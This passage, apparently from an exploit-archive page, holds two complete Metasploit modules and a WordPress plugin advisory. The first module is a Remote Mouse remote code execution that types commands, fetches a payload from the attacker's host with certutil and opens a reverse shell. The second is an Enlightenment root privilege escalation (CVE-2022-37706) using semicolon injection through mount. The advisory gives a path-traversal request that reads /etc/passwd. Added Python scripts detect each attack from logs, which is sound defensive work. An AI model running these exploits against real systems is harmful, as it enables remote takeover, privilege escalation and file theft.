'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py' ]<br /> ],<br /> 'Arch' => [ ARCH_X64, ARCH_X86 ],<br /> 'Platform' => 'win',<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> ['default', {}],<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/shell/reverse_tcp'<br /> },<br /> 'DisclosureDate' => '2019-04-15',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] # typing on screen<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1978]),<br /> OptInt.new('SLEEP', [true, 'How 
long to sleep between commands', 1]),<br /> OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\'])<br /> ]<br /> )<br /> end<br /><br /> def path<br /> return datastore['PATH'] if datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def key_value(key)<br /> characters = {<br /> 'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112',<br /> 'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127',<br /> 'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122',<br /> 'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',<br /> 'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',<br /> 'Z' => '8[ras]111',<br /><br /> 'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',<br /> 'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',<br /> 'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',<br /> 'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',<br /> 'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',<br /> 'z' => '7[ras]79',<br /><br /> '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',<br /> '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',<br /><br /> "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',<br /><br /> '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',<br /> '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' 
=> '7[ras]20', '@' => '8[ras]117',<br /> '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',<br /> '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',<br /> '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',<br /> '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',<br /> ',' => '7[ras]25', '.' => '7[ras]27'<br /> }<br /> "key #{characters[key]}"<br /> end<br /><br /> def windows_key<br /> 'key 3cmd'<br /> end<br /><br /> def check<br /> connect<br /> response = sock.get_once<br /> disconnect<br /> if response.include?('SIN 15win nop nop')<br /> splits = response.split(' ')<br /> return CheckCode::Appears("Received handshake with version: #{splits.last}")<br /> end<br /><br /> CheckCode::Unknown('Invalid response from target')<br /> end<br /><br /> def send_command(command)<br /> if command == windows_key<br /> sock.put(command)<br /> elsif (command == "\n") || (command == "\b") # don't split this up<br /> sock.put(key_value(command))<br /> else<br /> command.each_char do |c|<br /> sock.put(key_value(c))<br /> end<br /> sock.put(key_value("\n"))<br /> end<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> p = generate_payload_exe<br /> send_response(cli, p)<br /> print_good("Payload request received, sending #{p.length} bytes of payload for staging")<br /> end<br /><br /> def exploit<br /> connect<br /><br /> print_status('Connecting')<br /> print_status('Sending Windows key')<br /> send_command(windows_key)<br /><br /> print_status('Opening command prompt')<br /> send_command('cmd.exe')<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> print_status('Sending stager')<br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'<br /> register_file_for_cleanup("#{path}#{filename}")<br /> 
# I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2<br /> stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"<br /> start_service('Path' => '/') # start webserver<br /> send_command(stager)<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> print_status('Executing payload')<br /> send_command("#{path}#{filename} && exit")<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> handler<br /> disconnect<br /> sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert<br /> end<br />end<br /></code></pre>
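Seen from the detection side, the staging step in the module above is a `certutil.exe -urlcache -f` download followed by a process start from the same path. The following is an added example, not part of the Metasploit module: it correlates those two events per host. The event tuple layout, host names and file names are constructed sample data and do not follow any particular EDR schema.

```python
import ntpath

def norm(path):
    """Case- and separator-insensitive form of a Windows path."""
    return ntpath.normcase(ntpath.normpath(path.strip('"')))

def certutil_download(cmdline):
    """Return (url, destination) when cmdline is a certutil -urlcache fetch, else None."""
    tokens = cmdline.split()  # assumes no spaces inside the destination path
    if not tokens or not ntpath.basename(tokens[0].strip('"')).lower().startswith("certutil"):
        return None
    flags = {t.lstrip("-/").lower() for t in tokens[1:] if t[0] in "-/"}
    rest = [t for t in tokens[1:] if t[0] not in "-/"]
    urls = [t for t in rest if t.lower().startswith(("http://", "https://"))]
    dests = [t for t in rest if t not in urls]
    if "urlcache" not in flags or not urls or not dests:
        return None
    return urls[0], norm(dests[-1])

def find_staged_executions(events, window=300):
    """events: time-ordered (epoch_seconds, host, image_path, command_line) tuples."""
    pending, hits = {}, []
    for ts, host, image, cmdline in events:
        download = certutil_download(cmdline)
        if download:
            pending[(host, download[1])] = (ts, download[0])
            continue
        started = pending.get((host, norm(image)))
        if started and ts - started[0] <= window:
            hits.append({"host": host, "path": norm(image), "url": started[1], "delay": ts - started[0]})
    return hits

CERTUTIL = r"C:\Windows\System32\certutil.exe"
SAMPLE_EVENTS = [  # constructed process-creation events, not captured data
    (1000, "WS-01", CERTUTIL, r"certutil.exe -urlcache -f http://192.0.2.10:8080/ c:\Windows\Temp\kQ3xZ9aB.exe"),
    (1002, "WS-01", r"C:\Windows\Temp\kQ3xZ9aB.exe", r"c:\Windows\Temp\kQ3xZ9aB.exe"),
    (1100, "WS-02", CERTUTIL, r"certutil.exe -hashfile C:\Users\a\setup.exe SHA256"),
    (1101, "WS-02", r"C:\Users\a\setup.exe", r"C:\Users\a\setup.exe"),
    (2000, "WS-03", CERTUTIL, r"certutil -urlcache -f https://192.0.2.20/t.bin C:\Temp\t.exe"),
    (9000, "WS-03", r"C:\Temp\t.exe", r"C:\Temp\t.exe"),
]

if __name__ == "__main__":
    for hit in find_staged_executions(SAMPLE_EVENTS):
        print(hit)
```

Only the WS-01 pair is reported: the `-hashfile` call is not a download, and the WS-03 execution falls outside the correlation window.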
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ubuntu Enlightenment Mount Priv Esc',<br /> 'Description' => %q{<br /> This module exploits a command injection within Enlightenment's<br /> enlightenment_sys binary. This is done by calling the mount<br /> command and feeding it paths which meet all of the system<br /> requirements, but execute a specific path as well due to a<br /> semi-colon being used.<br /> This module was tested on Ubuntu 22.04.1 X64 Desktop with<br /> enlightenment 0.25.3-1 (current at module write time)<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Maher Azzouzi' # discovery, poc<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit' ],<br /> [ 'URL', 'https://twitter.com/maherazz2/status/1569665311707734023' ],<br /> [ 'CVE', '2022-37706' ]<br /> ],<br /> 'DisclosureDate' => '2022-09-13',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'PrependFork' => true, # so we can exploit multiple times<br /> 'WfsDelay' => 10<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> 
register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def find_enlightenment_sys<br /> enlightenment_sys = '/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys'<br /> if file_exist?(enlightenment_sys)<br /> vprint_good("Found binary: #{enlightenment_sys}")<br /> if setuid?(enlightenment_sys)<br /> vprint_good("It's set for SUID")<br /> # at this time there doesn't seem to be any other way to check if it'll be exploitable<br /> # like a version number as a patch hasn't been released yet<br /> return enlightenment_sys<br /> else<br /> return nil<br /> end<br /> else<br /> vprint_status('Manually searching for exploitable binary')<br /> # https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh#L7<br /> binary = cmd_exec('find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1')<br /><br /> vprint_good("Found SUID binary: #{binary}") unless binary.nil?<br /> return binary<br /> end<br /> end<br /><br /> def check<br /> enlightenment_sys = find_enlightenment_sys<br /> return CheckCode::Safe('An exploitable enlightenment_sys was not found on the system') if enlightenment_sys.nil?<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable? 
base_dir<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> print_status('Finding enlightenment_sys')<br /> enlightenment_sys = find_enlightenment_sys<br /> if enlightenment_sys.nil?<br /> fail_with Failure::NotFound, 'An exploitable enlightenment_sys was not found on the system'<br /> end<br /><br /> # Upload payload executable<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> dev_path = "/dev/../tmp/;#{payload_path}"<br /> register_files_for_cleanup(payload_path)<br /><br /> print_status('Creating folders for exploit')<br /> cmd_exec('rm -rf /tmp/net; mkdir -p /tmp/net')<br /> cmd_exec("mkdir -p \"#{dev_path}\"")<br /> # Launch exploit with a timeout. We also have a vprint_status so if the user wants all the<br /> # output from the exploit being run, they can optionally see it<br /> enlightenment_sys = find_enlightenment_sys<br /> print_status 'Launching exploit...'<br /> cmd_exec("#{enlightenment_sys} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \"#{dev_path}\" /tmp///net", nil, datastore['WfsDelay'])<br /> end<br />end<br /></code></pre>
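The invocation pattern used by the module above can be checked for in audit logs. The following is an added example, not part of the Metasploit module: it rebuilds argv from auditd-style EXECVE records and flags `enlightenment_sys` being run with `/bin/mount` path arguments that contain a semicolon (or other shell metacharacter) or a `..` segment. The records are constructed sample data, and the set of metacharacters checked is an assumption.

```python
import posixpath
import re

ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|((?:[0-9A-Fa-f]{2})+))')
SHELL_META = set(";|&`$")

def parse_execve(record):
    """Rebuild argv from an auditd EXECVE record; unquoted values are hex-encoded."""
    args = {}
    for index, quoted, hexed in ARG.findall(record):
        args[int(index)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return [args[i] for i in sorted(args)]

def flag_execve(record):
    """Return (argument, reason) pairs for mount path arguments passed via enlightenment_sys."""
    argv = parse_execve(record)
    if [posixpath.basename(a) for a in argv[:2]] != ["enlightenment_sys", "mount"]:
        return []
    findings, skip = [], False
    for arg in argv[2:]:
        if skip or arg.startswith("-"):
            skip = arg == "-o"  # the token after -o is an option list, not a path
            continue
        meta = sorted(SHELL_META & set(arg))
        if meta:
            findings.append((arg, "shell metacharacter: " + " ".join(meta)))
        if ".." in arg.split("/"):
            findings.append((arg, "parent-directory segment"))
    return findings

ESYS = "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys"
HEX_PATH = "/dev/../tmp/;/tmp/a b".encode().hex().upper()  # args with spaces are logged as hex
SAMPLE_RECORDS = [  # constructed records, not captured data
    f'type=EXECVE msg=audit(1663060000.101:812): argc=6 a0="{ESYS}" a1="/bin/mount" a2="-o" '
    'a3="noexec,nosuid,nodev,uid=1000," a4="/dev/../tmp/;/tmp/.Xy7Qa" a5="/tmp///net"',
    f'type=EXECVE msg=audit(1663060050.330:840): argc=6 a0="{ESYS}" a1="/bin/mount" a2="-o" '
    f'a3="noexec,nosuid" a4={HEX_PATH} a5="/tmp///net"',
    f'type=EXECVE msg=audit(1663060100.007:901): argc=6 a0="{ESYS}" a1="/bin/mount" a2="-o" '
    'a3="noexec,nosuid,nodev" a4="/dev/sdb1" a5="/media/usb"',
    'type=EXECVE msg=audit(1663060200.500:950): argc=3 a0="/bin/mount" a1="/dev/sdb1" a2="/mnt"',
]

if __name__ == "__main__":
    for record in SAMPLE_RECORDS:
        print(flag_execve(record))
```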
<pre><code>=====[ Tempest Security Intelligence - ADV-15/2022 ]==========================<br /><br />WordPress plugin - WPvivid Backup - Version < 0.9.76<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents ]=================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability Information ]=========================================<br /> * Class: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br /> * CVSS Base Score 7.2<br /><br />=====[ Overview ]==========================================================<br /> * System affected : WordPress plugin - WPvivid Backup<br /> * Software Version : Version < 0.9.76<br /> * Impacts : The WPvivid Backup plugin does not sanitise and validate a parameter before using it to read the content of a file, allowing high-privilege users to read any file from the web server via a path traversal attack.<br /><br />=====[ Detailed description ]==============================================<br /> * Steps to reproduce<br /><br />1 - Authenticated as a privileged user, copy the request below and replace the placeholder {{nonce}} with a valid nonce:<br /> ```<br />https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922<br /> ```<br /><br />=====[ Timeline of disclosure ]============================================<br /><br />11/Aug/2022 - Responsible disclosure was initiated with the vendor.<br />15/Aug/2022 - WPvivid Support confirmed the issue.<br />16/Aug/2022 - WPvivid Support fixed the issue.<br />08/Aug/2022 - A CVE was assigned and reserved as CVE-2022-2863.<br /><br />=====[ Thanks & Acknowledgements ]=========================================<br /> * Tempest Security Intelligence [5]<br /><br />=====[ References ]========================================================<br /><br />[1] https://cwe.mitre.org/data/definitions/22.html<br />[2] https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a<br />[3] https://www.tempest.com.br<br />[4] https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5<br />[5] Thanks FXO,ACPM,MFPP<br /><br />=====[ EOF ]===============================================================<br /></code></pre>
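To find requests of the kind shown in the advisory above in web-server access logs, the `file_name` parameter has to be percent-decoded (possibly more than once) before it is checked. The following is an added example, not part of the advisory or the plugin: it flags `wpvivid_download_export_backup` requests whose `file_name` is an absolute path or contains a `..` segment. The log lines, client addresses and nonce value are constructed sample data in combined-log style.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ACTION = "wpvivid_download_export_backup"  # AJAX action named in the advisory

def fully_decode(value, rounds=3):
    # Undo nested percent-encoding (%252e -> %2e -> .), bounded to a few rounds.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_reason(file_name):
    """Return why file_name cannot be a plain backup file name, or None if it looks fine."""
    name = fully_decode(file_name).replace("\\", "/")
    if name.startswith("/") or re.match(r"[A-Za-z]:", name):
        return "absolute path"
    if ".." in name.split("/"):
        return "parent-directory segment"
    return None

def scan_access_log(lines):
    """Return (line_no, client_ip, reason, decoded_file_name) for each suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query)
        if ACTION not in query.get("action", []):
            continue
        for raw in query.get("file_name", []):
            reason = traversal_reason(raw)
            if reason:
                findings.append((line_no, line.split()[0], reason, fully_decode(raw)))
    return findings

def sample_line(ip, query):
    return f'{ip} - - [11/Aug/2022:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?{query} HTTP/1.1" 200 922'
BASE = "_wpnonce=abc123&action=wpvivid_download_export_backup&file_name="
SAMPLE_LOG = [  # constructed access-log lines, not captured traffic
    sample_line("198.51.100.7", BASE + "../../../../../../../etc/passwd&file_size=922"),
    sample_line("198.51.100.7", BASE + "%2e%2e%2f%2e%2e%2fwp-config.php"),
    sample_line("203.0.113.9", BASE + "%252e%252e%252fwp-config.php"),
    sample_line("192.0.2.44", BASE + "example.com_wpvivid_export.zip&file_size=1048576"),
    sample_line("192.0.2.44", "action=heartbeat&file_name=../x"),
]
```

Parameters sent in a POST body do not appear in access logs, so this check covers only requests that carry `file_name` in the URL, as the advisory's request does.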